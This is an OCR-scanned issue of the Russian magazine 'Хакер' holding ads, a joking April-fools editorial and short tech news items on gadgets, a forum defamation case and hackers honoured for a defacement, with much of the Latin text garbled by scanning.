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Повысьте эффективность работы 
и ускорьте развитие своей компании 



Гарантия - 3 года 
Бесплатная доставка по Москве 
Вся продукция сертифицирована 
(РОСС РУ. МЕ61.В01302) 



Универсальный сервер Маіог, на базе процессора 
ІпіеІ® Хеоп® поможет Вам повыситьэффективность 
труда сотрудников и в более полной мере удовлетворять 

желания и потребности клиентов . 



Заказ серверов: 



Подробная информация на сайте: ѵѵѵѵѵѵ.ехсііапсі.ги 

и по телефону: (495) 727-0231 



КОРПОРАТИВНЫЙ ОТДЕЛ: 

(495) 727-0231; е-таіі: Ь2Ь@ехсіІап<±ги 



и е-таіІ:іп1Ъ@ехсіІап<±ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іпТо@ехсіІап<±ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:іп1 : о@ехсіІап<±ги ѵѵѵѵѵѵ.ехсііапсі.ги е-таіІ:і 



Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Іодо, ІпіеІ, ІпіеІ Соге, ІпіеІ Іодо, ІпіеІ Іпзісіе, ІпіеІ Іпзісіе Іодо, ІпіеІ ЗреесІЗІер, ІпіеІ Ѵііѵ, ІпіеІ Хеоп, Ііапіит, Ііапіит Іпзісіе, Соге Іпзісіе, 
Репііипл и Репііит Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации ІпіеІ или ее подразделениям на 
территории США и других стран. 








Интра — самая честная часть журнала. Тут мы высказываем свои 
соображения, сообщаем различные новости. Сегодня у меня хоро- 
шая новость. Во-первых, мы регистрируем свою партию. Партию 
журнала «Хакер». На сегодняшний день готов устав, цели, утверж- 
ден координационный совет (более подробно о координацион- 
ном, сельском и районном совете ты можешь прочесть в рубрике 
«етаіі»). Точные партийные цели мы пока не утвердили, но в наш 
деревенский клуб уже съезжаются представители прессы, порно- 
звезды, журналисты, коллектив кафедры института Мелиорации и 
Центра Американского Английского в полном составе. Потихоньку 
празднуем. Присоединяйся. Кроме того, журнал «Хакер» вырос 
до 235 полос. Из них 2/3 мы будем оформлять транслитом. Почему 
транслитом? Потому что нужно чтить заветы предков. Когда-то ведь 
не все поддерживали кириллицу, и многие хакеры в совершенстве 
владели транслитом. Так что вливайся, но это не так просто. Чтобы 
влиться в наши ряды, ты должен внести Нашему Великому Лидеру 
(это я и есть) не менее десяти девственниц, пятидесяти галлонов 
пальмового виски и двенадцати пудов тюленьего жира. Дело в том, 
что в нашем подвальчике нет электричества, поэтому мониторы мы 
освещаем фитилями, укрепленными в гигантских бочках с жиром. 
Ну, а что делать с девственницами, как-нибудь придумаем. На этом 
позвольте откланяться. Нет, стоп. После прочтения этой страницы 
вырви ее с корнем, съешь, запей кипяченой водой и осмотрись. Ас- 
социация секретная. 



Р.З. Данный текст был написан в день сдачи номера, посвящен пер- 
вому апрелю и может частично или полностью не совпадать ни с чем 
в реальности. Редакция напоминает, что этот текст предназначен 
только для того, чтобы указать производителям на их ошибки. Вот, 
например, можно ли быкам-производителям указать на их ошибки? 
Не будет ли это чревато? 

Р.Р.З. Рукопись обрывается, далее идут пятна тюленьего жира и го- 
рячие слезы девственниц. 



Поток сознания доктора Лозовского, работающего третьи сутки. 
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МЕѲАЫЕѴѴЗ 



Сигнализация 
на ноѵт 

Тѳм, кто всегда и всюду таска- 
ет с собой ноут, необходимо 
постоянно быть настороже, как 
бы его кто не умыкнул. Даже в 
любимом кафе с ѴѴі-Рі инетом, 
пока отходишь от столика за оче- 
редной чашкой кофе, приходится 
либо брать ноут с собой, либо, 
оставляя на столе, не сводить 
с него глаз. Но теперь найден 
способ, который покончите 
твоими переживаниями о судьбе 
электронного друга. Японская 
компания Кокиуо анонсировала 
оригинальную сигнализацию для 
ноутбуков — РИЗАРЕВ РС-САРЮ. 
Устройство выполнено в форме 
стандартной РСМСІА-карты, а для 
активации сигнализации доста- 
точно всего лишь вставить его в 
соответствующий слот ноутбука. 
Теперь, когда воришка попытает- 
ся утащить ноут, девайс среагиру- 
ет на движение и сразу же издаст 
душераздирающий вопль (1 10 
дБ). Правда, есть вероятность, что 
вор, схватив ноут, перепугается 
настолько, что выронит его из рук 
прямо в мягкие объятия кафель- 
ного пола. 

о 



Железный мѵл 

Для изнеженных американских 
солдат длительные переходы по 
пересеченной местности — тяже- 
лейшее испытание. Дополнитель- 
ные неудобства — 20 килограм- 
мов обязательной поклажи 
(оружие, боеприпасы, питание, 
медикаменты и т.п.), которые 
приходится тащить на себе. Узнав 
об этой проблеме, американское 
министерство обороны реши- 
ло щедро профинансировать 
разработки автономного робота, 
способного заменить обычного 
мула. На разработку подрядилась 
американская компания Возіоп 
Оупатісз, которая нынче с гор- 
достью докладывает о результа- 
тах работы. Созданный робот по 
кличке ВідОод наданный момент 
является самым совершенным 
четвероногим роботом на земле. 
По размерам он сопоставим с 
небольшим мулом или огромной 
собакой (1 метр — в длину, 0,7 — в 
высоту) и весит 75 кг, при этом на 
него можно нагрузить свыше 40 кг 
полезной массы. При разработке 
особое внимание было уделено 
мобильности и устойчивости 
робота — он способен передви- 
гаться со скоростью до 3,3 км/час, 
подниматься в горку с уклоном 
до 35 градусов, к тому же ему 
можно от души отвесить пинка, и 
он все равно не упадет (и даже не 
обидится). 

Изнутри робот до предела напич- 
кан всевозможными сенсорами, 
гироскопами, датчиками и прочей 
электроникой, а работает это все 
за счет бензинового двигателя. 
Сейчас ВідОод находится на 
стадии испытаний в реальных 
условиях, и если учесть, что в 
министерстве обороны впол- 
не довольны результатом, то 
создателям останется лишь 
поработать над внешним видом 
(который сейчас ужасен), испра- 
вить возможные проблемы — и 
можно будет выпускать серийную 
модель. Правда, непонятно: чем 
хуже живой мул? 





РОБОТ ПО КЛИЧКЕ ВІСБОС 




Начни день с головоломки 

Вопрос о том, как заставить себя утром (вовремя!) подняться с посте- 
ли, можно считать скорее риторическим. Стандартные будильники ни 
коим образом не решают проблему. А вот у устройства под названием 
Риггіе АІагт СІоск, похоже, есть все шансы отучить тебя от этой вред- 
ной привычки нежиться по утрам. От обычного будильника Риггіе АІагт 
СІоск отличает то, что кнопка выключения у него состоит из четырех 
частей, по форме напоминающих пазл. При наступлении времени X, 
под оглушительный писк будильника, детали пазла отпружинивают 
от корпуса и разлетаются в разные стороны. Теперь, чтобы заткнуть 
будильник, придется не только отыскать разбросанные по всей ком- 
нате детальки, но и решить, как собрать их в единое целое и вставить в 
первоначальное отверстие. И если в дневное время с этим справился 
бы и трехлетний ребенок, то спросонья это будет далеко не такой 
простой задачей: пока с ней управишься, успеешь окончательно и бес- 
поворотно проснуться. Уверяю, ты будешь ненавидеть эту штуку, зато 
в универе /в школе / на работе поставишь рекорд по пунктуальности. 
Девайс можно приобрести в онлайновом магазине ВітВатВапапа.сот 
по цене52у.е. 
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СорупдМГ © ІМокіа, 2005. Объем карты памяти, поставляемой вместе с телефоном, может варьироваться. Товар сертиф 





ІМОКІА 

Соппесйпд Реоріе 



Всего один поворот - и ваш новый Мокіа 3250 превратится 
в музыкальный плеер. И вы с друзьями окажетесь на концерте 
любимой группы. В любой момент. Легкий и быстрый доступ 
к функциям благодаря уникальному поворотному корпусу нового 
Мокіа 3250. До 750 песен СЭ-качества на карте памяти 512 Мб. 
2-мегапиксельная камера с 4-кратным цифровым зумом. 

Система Мокіа Хрге55Ми5іс. Наполните свою жизнь 

интересными поворотами! 

ѵѵѵѵѵѵ.покіа.ги 



Горячая линия Мокіа: (495) 727-2222. Часы работы: 08.00-20.00 (московское время), Пн. -Пт. 



ІМОКІА 



Хрге55Ми5ІС 



СІиЬ 

ІМОКІА 

ѵѵѵѵѵѵ.покіа.ги/СІиЬМокіа 



Повернутый на музыке 




Нелегальный секонд хэнд 

Многие привыкли считать, что российские законы — самые бредовые 
во всем мире. Однако и в законодательстве вполне цивилизованных 
стран присутствует изрядная доля маразма. Например, Япония уже 
много лет славится тем, что у большинства автовладельцев машины 
не задерживаются дольше трех лет. Причина этому — закон, при- 
нятый под давлением автомобильных гигантов, гласящий, что после 
трех лет эксплуатации автомобиля необходимо пройти техосмотр, 
затем до десяти лет проходить его каждые два года, после чего — и 
вовсе каждый год. А проблема-то в том, что стоимость каждой такой 
процедуры — несколько килобаксов, поэтому японцам выгоднее 
регулярно менять машины. Теперь же и производителям электроники 
захотелось такого же спроса на свою продукцию. Конечно, заинтере- 
сованные чиновники не решились вводить обязательного техосмотра 
теликов и компов, но зато с первого апреля текущего года вступит дру- 
гой закон, запрещающий перепродажу б/у электроники! Под эгидой 
безопасности потребителей чиновники планировали задавить весьма 
популярные комиссионные магазины. Только вот продавцы тоже не 
пальцем деланы. Отныне факт обмена электроники на деньги будет 
называться не продажей, а долгосрочной сдачей в прокат. 



100 ПЕСЕН — 
256 МБ 



МрЗ- башмаки 

Малоизвестная в России обувная компания ОАОА Рооіѵѵеаг анонси- 
ровала новый модельный ряд эксклюзивной спортивной обуви под 
кодовым названием Собе М. Уникальность новинки заключается во 
встроенном МРЗ-плеере! Точный объем набортной флеш-памяти не 
заявлен, но производители уверяют, что его хватит на 1 00 песен ( где-то 
256 Мб). Кнопки управления находятся на язычке одной из кроссовок, 
что, в принципе, довольно неудобно. К счастью, Собе М совместим с 
беспроводными наушниками, так что не придется мучиться, протягивая 
провод через штанину. Кстати, музыку можно слушать не только через 
наушники, но и через встроенные динамики, и даже со стереоэффек- 
том, ведь динамики расположены на боковой стороне каждого крос- 
совка. Для копирования песен и зарядки аккумуляторов используется 
ІІЗВ-интерфейс — соответствующие разъемы скрыты в тыловой части. 
Заряда батарей хватает на шесть часов — увы , функция автоматичес- 
кой подзарядки во время ходьбы не поддерживается. Начало продаж 
ожидается в самое ближайшее время, а стартовая цена составит 1 99,99 
американских президентов. 




60 футов 
до инета 

Если у тебя дома широкополос- 
ный доступ в инет, вспомни, каких 
усилий тебе стоило его заполучить. 
Впрочем, скорее всего, это было 
довольно просто: ты зашел в офис 
к провайдеру, подписал контракт, 
выложил некоторую сумму, после 
чего, неделю-другую спустя, к тебе 
в гости зашел бородатый мастер, 
который провел кабель и все на- 
строил. Однако далеко не всем так 
везет. К примеру, одному жителю 
Канады, Кевину Лавале, всю жизнь 
хотелось Интернета с нормальной 
скоростью, но в его небольшом 
городке (всего 2000 жителей) 
единственным вариантом был лишь 
диалап на 56 Кбод. И вот в один 
прекрасный день в городе появил- 
ся первый ІЗР-провайдер, который 
установил передатчик всего в кило- 
метре от дома Кевина. Да вот беда: 
для беспроводного подключения 
необходима прямая видимость, а 
всего в тридцати метрах от дома 
стоит огромная церковь, которая 
полностью закрывает вид на пере- 
датчик. Однако Кевин долго ждал 
не для того, чтобы так просто сдать- 
ся. Попытки установить антенну 
у кого-либо из друзей в соседних 
домах успехом не увенчались, и он, 
все тщательно измерив, пришел к 
выводу, что единственный способ 
поймать сигнал — установить у 
себя антенну высотой 60 футов 
(1 8,3 метра). Стальная вышка, 

1 4000 фунтов (6350 кг) цемента, 
несколько недель строительных 
работ — и сигнал пойман. Если 
хочешь попытаться повторить 
подвиг, то подробную инструкцию 
по сборке можно прочитать здесь: 
ѵѵѵѵѵѵ.зИогІ-тебіа.сот/геѵіеѵѵ. 
рМр?г=301 &р= 1 . 
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МісгозоП 




□ РИСКУЕМ ЛИ МЫ НАРУШИТЬ ПРАВА 
ИНТЕЛЛЕКТУАЛЬНОЙ СОБСТВЕННОСТИ? 

□ ОГРАДИТ ЛИ ЭТО НАС 

ОТ СУДЕБНЫХ РАЗБИРАТЕЛЬСТВ? 

□ МОЖЕМ ЛИ МЫ ПОЗВОЛИТЬ СЕБЕ РИСКОВАТЬ? 



□ это ших? 

□ ИЛИ ѴѴШОѴѴ5 5ЕКѴЕК? 




© 2006 МісгозоІТ Согрогаііоп. Все права защищены. Владельцем товарных знаков МісгозоП, ѴѴІпсІоѵѵз 
и ѴѴІпсІоѵѵз Бегѵег, зарегистрированных на территории США и/или других стран, и владельцем авторских 
прав на их дизайн является корпорация МісгозоІТ Другие названия компаний и продуктов, упомянутых 
в тексте, могут являться зарегистрированными товарными знаками соответствующих владельцев. 



еГ УЗНАЙТЕ ФАКТЫ 

ИССЛЕДОВАНИЕ СЕРВЕРНЫХ ПЛАТФОРМ 
ѴѴІЫЭОѴѴ5 И иічііх, ПРОВЕДЕННОЕ 
КОМПАНИЕЙ ѴАІЧКЕЕ СКОІІР, ПОКАЗАЛО, 

ЧТО ТОЛЬКО МІСВ050РТ полностью 
ЗАЩИЩАЕТ СВОИХ КЛИЕНТОВ ОТ РИСКОВ 
СУДЕБНОГО ПРЕСЛЕДОВАНИЯ ИЗ-ЗА 
НАРУШЕНИЯ ПРАВ ИНТЕЛЛЕКТУАЛЬНОЙ 
СОБСТВЕННОСТИ. 

«В настоящее время дистрибьюторы І_іпих предлагают 
лишь частичную компенсацию за возможное нарушение 
прав на интеллектуальную собственность. Убытки 
возмещаются по чрезвычайно низким ставкам, или же не 
обеспечивается абсолютно никакой защиты от судебных 
исков третьих сторон. Таким образом организации 
рискуют быть втянутыми в дорогостоящие судебные 
разбирательства». 

Лора Дидио, старший аналитик, Ѵапкее Сгоир 

Вся информация о проекте на тісгоБоД.сот/шБ/дейИеІаск 




ѴѴіпсіоѵѵб Бегѵег 2003 





32-БИТНЫИ ПРО Ц ЕССОР 
4 МБ ФЛЕШ-ПАМЯТИ 
16 МБ ОПЕРАТИВКИ 
2 ПОРТА ШВ 1.1 
1 ПОРТ ЕТНЕМЯЕТ 



Обратная отдача 

Одна из самых древних электронных игр (Ропд) определенно пережи- 
вает свое очередное (никто уже не помнит, какое по счету) рождение. 
Даже непонятно, как может примитивный двумерный пинг-понг оста- 
ваться популярным уже которое десятилетие. Пожалуй, все гениальное 
и вправду просто. Сейчас в Г ермании постепенно набирает все боль- 
шую популярность новая версия игровых автоматов РаіпЗіайоп. Данный 
автомат для игры в Ропд представляет собой массивный стол, в центре 
которого находится экран, а с двух сторон располагаются кнопки для 
управления ракетками и специальные площадки для ладоней. Каждый 
из игроков должен одной рукой нажимать на кнопки, а другую поло- 
жить на площадку. От обычного Ропд-автомата РаіпЗіаІіоп отличается 
тем, что игрок, пропустивший мяч, моментально получает от площадки 
неслабый электрический разряд, а заодно и резкий удар от встроенно- 
го миниатюрного хлыста по тыльной стороне ладони. Как утверждают 
опробовавшие автомат на себе, это добавляет игре ни с чем не сравни- 
мый азарт. Первый автомат РаіпЗіаІіоп появился на свет еще в 2001-м 
году, и вот теперь вышла новая версия, которая стала еще агрессивнее, 
динамичнее и, конечно, кровавее. Кстати, автомат не столь безобиден 
— после продолжительного матча легко заработать как неприятные 
ожоги от разрядов, так и ощутимые ссадины от хлыста, поэтому до игры 
допускают только тех, кто согласится взять всю ответственность на 
себя. 



Аинѵкс на Тѵксе 

Истинным фанатам линукса 
посвящается. Итальянская ком- 
пания Асте Зузіетз приступила 
к мелкосерийному производству 
компьютерных корпусов в форме 
обожаемого миллионами людей 
пингвинаТукса. Внешне новинка 
смотрится просто великолепно 

— точь-в-точь как на оригиналь- 
ной картинке. Высота корпуса 
составляет 17 см, а на ценнике 
значится всего 30 евро. Тебя, 
кстати, не смутила высота? Поп- 
робуй запихнуть в 1 7 см хоть одну 
системную плату с процессором, 
винчестером, блоком питания и 
всем прочим. Но ошибки тут нет 

— просто корпус предназначает- 
ся исключительно для фирменной 
системной платы от Асте Зузіетз 
-Асте Рох, габариты которой 
составляют всего 6,6 на 7, 1 см ! 

На этой крохе разработчики 
умудрились разместить 32-битный 
ВІЗС-процессор, работающий на 
частоте 20 МГ ц, 4 Мб флеш-па- 
мяти и 1 6 Мб оперативки (все это 
внутри одного чипа), а также два 
порта ІІЗВ 1 . 1 и один порт ЕіИегпеі 
(10/1 00 Мбит). Между прочим, 
такой конфигурации вполне 
достаточно для запуска той самой 
операционной системы. Систем- 
ная плата продается отдельно от 
корпуса, и за нее придется отдать 
ЮОевро. 



Экстремаль- 
ные шредеры 

Как там поживает твоя паранойя? 
Все еще боишься неожиданного 
стука в дверь? А ты уже решил, 
что будешь делать в экстренной 
ситуации с «плохими» дисками и 
дискетами? Выбрасывать в окно? 
Пытаться проглотить? Неудач- 
ные решения! Специально для 
фанатов конспирации японские 
компании, ЕІесот и ІМакаЬауазИі, 
практически одновременно 
выпустили компактные модели 
шредеров, способных превра- 
щать в лапшу не только бумажные 
документы. Так, девайс от ЕІесот 
готов моментально нарезать на 
ровные кусочки заодно и СЭ/Э\Ю- 
болванки (совместимость с ВІи- 
Вау и НО ЭѴЭ не уточняется). Этот 
монстр уже поступил в свободную 
продажу по ориентировочной 
цене в 1 7850 йен (примерно 1 53 
бакса). Устройство от ІМакаЬауазНі 
отличается большей универсаль- 
ностью — одновременно шредер 
способен пережевать одну 
болванку или дискету, кредитку 
или пять почтовых карточек. 
Засовывать пальцы не рекомен- 
дуется. Цена пока не уточняется. 
Кстати, если обзаведешься 
подобным шредером, то не забудь 
и его подключить к ИБП, ведь ни от 
батареек, ни от ручной тяги он не 
работает. 
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БЕЗЛИМИТНЫЕ ВЫХОДНЫЕ 



ГОВОРИ 

СКОЛЬКО ХОЧЕШЬ, 
С КЕМ ХОЧЕШЬ! 



ПОДКЛЮЧИ УСЛУГУ @002226 

Ты можешь говорить с кем угодно, сколько угодно и о чём угодно! По выходным все местные 
и мобильные звонки не стоят ни цента! Достаточно подключить услугу «Безлимитные выходные», 
позвонив по телефону 002226. Предложение действует с 1 апреля по 27 августа 2006 г. 




ѵѵѵѵѵѵ.тііз.ги 





Много дюймов каждому 

Выбор больших мониторов растет. Естественно, речь идет не о том, 
что они толстеют или тяжелеют, а о том, что ЖК-панелей с диагональю 
1 9 дюймов на рынке появляется с каждым днем все больше и больше, 
выбор увеличивается, а цены понемногу ползут вниз. 

Компания ВепО продолжает расширять свою линейку ЖК-мониторов 
с диагональю 1 9 дюймов. Сегодняшняя новинка называется РР93Ѵ. 
Технические характеристики монитора таковы: время отклика — 8 мс, 
яркость — 270 кд/м2, контрастность — 550: 1 , углы обзора по вертикали 
и горизонтали — 1 60 градусов, вес — около 6 кг, габаритные размеры 
— 483x420x266,6 мм. Для соединения с компьютером имеются порты Э- 
ЗиЬ и ОѴІ. Кроме того, с помощью креплений ѴЕЗА этот монитор можно 
повесить на стену, где он также будет очень хорошо смотреться. Чтобы 
он выделялся на твоем рабочем столе не только размерами, произво- 
дитель снабдил его стильным дизайном — блестящим белым пластиком 
и эргономичной формой. Как и большинство мониторов ВепО, данная 
модель оснащена функцией і-кеу — после одного нажатия на эту кнопку 
уже не придется возиться с настройками экрана, так как все будет 
сделано автоматически. 



ыеі іи 



Запись извне 

Несмотря на всевозрастающую 
популярность ІІазИ-накопителей, 
оптические носители не собира- 
ются сдавать позиций. Соответс- 
твенно, остается высоким и спрос 
на приводы для чтения и записи 
дисков. Компания І_С представила 
очередную новинку в этой сфере 
— внешний универсальный ЭѴО- 
накопитель ОЗА-21 66Э. В список 
поддерживаемых форматов 
входят все типы СО, ОѴО-В/-ВѴѴ, 
ОѴО+В/+ВѴѴ, ОѴО-ВАМ и двух- 
слойные диски: ЭѴЭ ОІ_+Н и -В. 
Привод поддерживает технологию 
ЫдІпіЗсгіЬе Оігесі: Оізк І_аЬеІіпд, 
которая позволяет создавать 
изображения на нерабочей сто- 
роне носителя, используя только 
средства оптического накопителя. 
Правда, эту технологию должны 
поддерживать сами диски и 
программа их записи (поставля- 
ется в комплекте с устройством). 
Собран привод в стильном черном 
корпусе, соединение с ПК про- 
исходит посредством шины ІІЗВ. 
Установка возможна как в верти- 
кальном, так и в горизонтальном 
положении. 



РЕС 

МРЗ 

ѴША 

МРЕС-1 

МРЕС-2 

МРЕС-4 

(БІѴХ,ХѴШ) 

А VI 

ѴОВ 



Мультимедиа- 
сервер 
в кармане 

Размеры мультимедийных уст- 
ройств постоянно уменьшаются, 
поэтому сегодня в кармане можно 
носить просто нереальные вещи. 
Например, для того, чтобы хранить 
фотки, видео и музыку, которые 
можно проиграть/просмотреть на 
различных устройствах воспро- 
изведения, достаточно к ним 
подключиться. Это устройство 
ТѴіХ тіпі от компании ЭѴІСО. Пле- 
ер этот имеет одну очень важную 
особенность: у него нет дисплея, 
то есть на нем одном проиграть 
ничего нельзя, зато он обладает 
огромным количеством аудио- 
и видеовыходов, с помощью 
которых его можно подключать 
практически к любой технике, где 
и будет осуществлено проигры- 
вание мультимедийного контента. 
Его может быть очень много, так 
как для хранения отведен жесткий 
диск на 1 20 Гб, а воспроизводить 
можно форматы ОРЕО, МРЗ, ѴѴМА, 
МРЕО-1 , МРЕО-2 и МРЕО-4 (ЭіѵХ, 
ХѴЮ), АѴІ и ѴОВ. Стоит отметить 
наличие функции ОТО, то есть 
копирование на устройство можно 
осуществлять с других девайсов, 
без посредничества ПК. Кстати, 
с ним связь осуществляется по 
шине ІІЗВ 2.0. Г абариты ТѴіХ тіпі 
составляют 82x1 27,5x20 мм, а вес 
— 180 г. 
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іѵмѵѵ.Ыка.ги 



йеег Тго ѵеІМлІеЖО - науійук, коюр^л формирует 

прмпавление О Т&м, что моииодаіадзты ЭТНМЫЧ1НИ№НН№ 

ткю&пйй мир* і#(йипьмылПК. И!ь*мнчкть корпуса Ада ТглѵеІМіСй &й№ 
ГйрмОнѵічнО С ВД ^рюа д уш АПЁм&чтами, йыГйРч*чымн »ч ныоОкогіючнйт угпёгІлШика. 
Сжр_€ні-і=.коѵ^ннді_ияс"^.ч І пргмзБодшълычсст^ н. [^ічв4і*^і _ ьяссг^ дсстѵгаегср Н СЧЕТ КПОГЬЭЗВаі-ИН 
ТЯСНОПОГИН ІПІЕІ Й СеПІЛПО® 0^0 пг? МІ>5иЛЬЬь.і ИМПЬЩТері^Е. передала РЩЫОРНОСТЕЙ беспмвіодьь^ 

шрийьчгй 1-Э Меігііпий«івді?ц з^неры Д«г ОгЬіСэга а также щугцкфнрменку^ те^иогадгий Ада, 
которые памогуі іпещчеркнуіъЁаши г-]гефнск , аналиэы 1 ишпетЕтнопъ иэпидсрсізоі мире Йльего &иика. 



* Т^ѵ№№Укн ІЯЫ*С№ШПО* О.г.ія» цйбндоыл ій™зічл* 

- ГЬимр-: с ар кт! йі® Сел ^ Спи 

■ Н^ыйірж^иМоЫгкт!гі* Й5РМ Еарггл 

- УМЧ «№?*•»«* ГН V: И,Т#^ ^(.ЧІГ*^ 

- ГѴЩ1И--М ■« >.р РіО!>І№ЧІ 

- ІЧГ Ш.СІ+ (НЮ 1 1[ВД тп 

* ХШ гра&г-імі» дші?№сМ М&зѵДОЪш^п н юсам!*' ■ ѵ* (№ітот%« і^ті^Чг-ісг,' 1 " 

■ зс 2*'і ол^фцііжгйѵя^-ѵ*~-'ііО^<&З^Бі77 М г 4 
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Фильм на стене 



Если ты думаешь, что проектор — это офисный атрибут, с помощью 
которого шустрые менеджеры в костюмах демонстрируют руководству 
графики и диаграммы предполагаемого роста прибыли, то ты сильно 
ошибаешься. Дома он тоже может вполне пригодиться: например, 
станет частью домашнего кинотеатра. А уж поиграть в крутой шутер, 
растянув изображение на полстены, — это, поверь, незабываемые ощу- 
щения. Если тебе нравится такая идея, то знай, что компания ѴіеѵѵЗопіс 
расширяет свой модельный ряд данных устройств. Например, проектор 
Сіпеі 000 с соотношением сторон 1 6:9 для широкоэкранного домаш- 
него кинотеатра. Он весит 4 кг, обеспечивает световой поток в 1 000 лм 
и контрастность — 2000:1 . Для подключения имеются разъемы ОѴІ-І 
(НЮСР-совместимый), композитный, компонентный (ѴРЬРг) и 8-Ѵібео. 
Проекторы Р0458О со световым потоком 2000 лм и Р0766О со свето- 
вым потоком 2500 лм обеспечивают оптимальный просмотр видео и 
представление данных, поэтому днем могут использоваться в офисе, а 
вечером — дома. Они обладают разрешением ХОА 1 024x768 и контрас- 
тностью 2000: 1 . Р34580 весит 2, 2 кг, а Р47660 — 3,6 кг. 
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СООТНОШЕНИЕ СТОРОН 
ДЛЯ ШИРОКОЭКРАННОГО 
ДОМАШНЕГО КИНОТЕАТРА 




Пишем 
в цифровом 
виде 




На недавно закончившейся 
выставке СеВІТ 2006 различными 
компаниями были представле- 
ны такие любопытные новинки, 
как, например, новая цифровая 
ручка компании І_одііесИ — іо 2 
ОідііаІ Реп, с помощью которой 
можно мгновенно конвертировать 
рукописные записи в цифро- 
вой формат. Ручка и ее новое 
программное обеспечение более 
плотно работает с приложени- 
ем МісгозоІіѴѴогб и клиентами 
электронной почты, что позволяет 
перенести рукописные записи в 
текстовый процессор нажатием 
одной кнопки. Кроме того, ручка 
имеет и режим обучения, бла- 
годаря которому (а также связи 
с индивидуальными словарями 
пользователя из комплекта при- 
ложений МісгозоІІ ОТТісе) более 
четко распознаются сокращения, 
имена, термины и прочие персони- 
фицированные части лексикона 
пользователя. Интересной осо- 
бенностью устройства является 
поддержка фирменной технологии 
І_оді1есИ іоТадз, смысл которой за- 
ключается в том, чтобы запускать 
типовые задачи, не путешествуя по 
многочисленным меню, а просто 
нарисовав на экране соответству- 
ющий символ. В комплект каждой 
ручки будет входить записная 
книжка формата А5. 



Слушать 

качество 

Если бы не особая, многократно 
отмеченная в литературе, синема- 
тографе и прочих видах искус- 
ства атмосфера кинотеатров, то 
сегодня в них наверняка сильно 
прибавилось бы свободных мест, 
так как современные возмож- 
ности техники, позволяющие 
смотреть фильмы дома, очень и 
очень возросли. Именно к таким 
устройствам относится новая 
шестиканальная акустическая 
система МісгоІаЬ Х27. Ее саттели- 
ты — тонкие и стильные — можно 
установить на пол или закрепить 
на стену, причем динамики защи- 
щены магнитным экранировани- 
ем, и можно, не опасаясь помех, 
ставить их рядом с другими при- 
борами. Состоит каждая колонка 
из дюймового высокочастотного 
динамика и расположенных по его 
бокам трехдюймовых среднечас- 
тотных. Сабвуфер же комплекта 
имеет 8 дюймов диаметра. Пока- 
затель ВМЗ у колонок составляет 
50 Вт, а у сабвуфера — 1 00 Вт, 
а габариты — 205x480x370 мм и 
98x1 1 1 5x290 мм, соответственно. 
Кроме того, в комплект поставки 
входит пульт ДУ. 
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Губернатор против 
форума 

Интересный прецедент произошел в городе 
Ковров. Есть в этом городке интернет-форум, 
где обсуждается местное житие-бытие. Осо- 
бенно завсегдатаи форума любят дискутиро- 
вать по поводу политики, и особенно о губер- 
наторе города Николае Виноградове, которого 
там считают если не дьяволом во плоти, то уже 
точно каким-нибудь адским демоном. В конце 
января в разделе «СМИ, политика» на форуме 
появился тред: «Слухи о готовящемся убийс- 
тве главы Коврова», где народ обсуждал, кому 
может быть выгодно убийство губернатора (по 
мнению форумчан — всем), а попутно накину- 
ли к портрету своего главы еще пару черных 
красок. Каким-то образом об этой интернет- 
дискуссии узнал сам Николай Виноградов и, 
стоит ли говорить, не слишком обрадовался. 
Решив, что отстаивать свою честь постами на 
форуме ему не к лицу, Виноградов подал заяв- 
ление в органы, пожаловавшись на клевету. 
Сотрудники УВД учли мнение народа и реши- 
ли, что парни действительно переборщили, в 
связи с чем было возбуждено уголовное дело. 
Оказалось, узнать, кто причастен к инциденту 
и кто стоит за сетевыми никами, милиции не 
так-то просто. Скорее всего, ковровские поли- 
смены так и остались бы с носом, если бы один 
из модераторов, Дмитрий Ташлыков, не со- 
знался в причастности к работе над форумом. 
«Ой, какхорошо!», — обрадовались органы и 
тутже провели допрос с обыском и изъятием 
техники подозреваемого. В юридических 
кругах области мнения по поводу этого дела 
разделились. Одни считают, что форумы — это 
не СМИ, поэтому не могут восприниматься как 
средство распространения клеветы. Другие 
считают, что за свои слова нужно отвечать, 

— не важно где и как они были произнесены. 
Понятное дело, поступок Виноградова вызвал 
волну новой бурной дискуссии, ведущейся 
сейчас под лозунгом: «Губернатор против 
форума коѵгоѵ.ги» . Чем все закончится — пока 
неясно, но пропиарил сайт политик знатно. 




Грамота 
за взлом 

Чего не хватает крутым хакерам? Компьютеров — полный дом, денег куры не клюют, 
соответственно, и девочек — вагон. А не хватает крутым хакерам грамоты за их 
труды. Причем не какой-нибудь, а государственной, врученной депутатом, с крепким 
рукопожатием. Конечно, сама грамота хакеру нужна как корове седло, но потешить 
самолюбие — самое то. Так вот, недавно в Г осударственной Думе прошло именно 
такое награждение хакеров, с вручением почетной грамотны за дефейс сайта. 

Это не значит, что ты можешь нести в Думу логи хакнутых тобой Пентагона и ЦРУ, 
надеясь на медаль. Просто сайт еѵгеѵ.сот . который взломали парни, публиковал 
разные провокационные статьи на тему «давайте уничтожим православные религи- 
озные символы». И депутаты решили, что борьба с авторами призывов путем взлома 
вполне оправдана, даже приветствуется. «Как депутат Г осударственной Думы, 
член Комитета по безопасности, хочу выразить благодарность Отделу Информации 
НСД «Славянский Союз» за бдительность и недавнее пресечение размещения в 
Интернете русофобских и иных, разжигающих межрелигиозную рознь, материа- 
лов. Надеюсь, и впредь ваша работа будет не менее продуктивна и идеологически 
выверена» , — произнес речь депутат, вручая грамоту хакерам. Интересно, а что 
полагается тем, кто взломает персональную страничку Усамы Бен Ладена? Не иначе 
как звезда героя России :). 



ПОТЕШИТЬ САМОЛЮБИЕ — 

САМОЕ ТО 
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Хакеры 
добрались 
до любителей 

ПОРНУШКИ 

В жизни каждой крупной компании 
рано или поздно настает черная 
полоса. Теперь очередь дошла 
и до ІВІІІ. Основанная в 1 997-м 
году, эта контора всего за 5 лет 
заняла ведущие позиции на рынке 
биллинга, достигнув оборота в 400 
миллионов долларов. Понятное 
дело, не от домашних страничек 
домохозяек поступал основной 
доход — компания специализиро- 
валась на работе с порнушными 
сайтами, которые составляли 85% 
всех ее клиентов. И вот в 2002 -м 
году у ІВІІІ начались проблемы. 
Сначала с кредитной компанией 
Ѵіза, которая ввела новые, не 
самые благоприятные условия 
при работе с ХХХ-сайтами. Затем 
с Мазіегсагб, которая в судебном 
порядке потребовала ІВІІІ выпла- 
тить многомиллионный штраф за 
